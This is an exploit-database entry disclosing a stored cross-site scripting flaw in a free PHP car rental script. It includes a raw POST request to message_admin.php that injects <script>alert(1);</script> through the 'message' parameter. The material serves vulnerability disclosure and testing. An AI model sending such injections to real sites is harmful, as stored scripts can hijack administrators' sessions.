Exploit for Car Rental Script Cross Site Scripting

## https://sploitus.com/exploit?id=PACKETSTORM:158857
====================================================================  
Car Rental Script - Stored XSS  
====================================================================  
####################################################################  
.:. Author : Yussef Dajdaj  
.:. Contact :  
.:. Vendor : https://projectworlds.in/  
.:. Script : https://projectworlds.in/free-projects/php-projects/car-rental-project-in-php-and-mysql/  
.:. Date: : 8/7/2020  
.:. Tested on: : Tested on: Window 10 64 bit environment || XAMPP  
####################################################################  
  
Description: The application allows an anthenticated user to send a msg to the app administrator, parameter message is vulnerable to XSS injections.  
  
===[ Exploit ]===  
  
[*] Stored Cross Site Scripting  
=================================  
  
I. Persistent XSS  
  
POST /testing/message_admin.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://localhost/testing/message_admin.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 37  
Cookie: PHPSESSID=noml4n6pvqi6tn83i8quqebtva  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
  
  
message=<script>alert(1);</script>&send=Send+Message